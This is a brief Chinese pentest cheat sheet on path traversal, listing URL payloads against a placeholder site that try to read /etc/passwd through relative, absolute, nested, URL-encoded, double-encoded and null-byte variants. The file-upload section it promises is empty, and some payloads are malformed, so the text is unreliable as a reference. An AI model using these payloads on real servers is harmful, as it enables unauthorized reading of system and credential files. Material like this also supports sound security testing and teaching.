【渗透总结】路径遍历与文件上传

目录遍历

# 相对路径遍历
https://insecure-website.com/loadImage?filename=../../../etc/passwd

# 绝对路径遍历
https://insecure-website.com/loadImage?filename=/etc/passwd

# 嵌套遍历
https://insecure-website.com/loadImage?filename=....//....//....//etc//passwd
https://insecure-website.com/loadImage?filename=....//....//....//etc//passwd

# URL编码遍历
# 单层相对
filename=%2e%2e%2fetc%2fpasswd
# 双层相对
filename=%252e%252e%252fetc%2fpasswd
# 双层相对
filename=.%%32%65/.%%32%65/.%%32%65/etc/passwd
# 从预期基本文件夹开始
filename=/var/www/images/...%2f...%2f...%2fetc/passwd
# 空字节截断
filename=.../.../.../etc/passwd%00.png

入门

进阶

本文参考：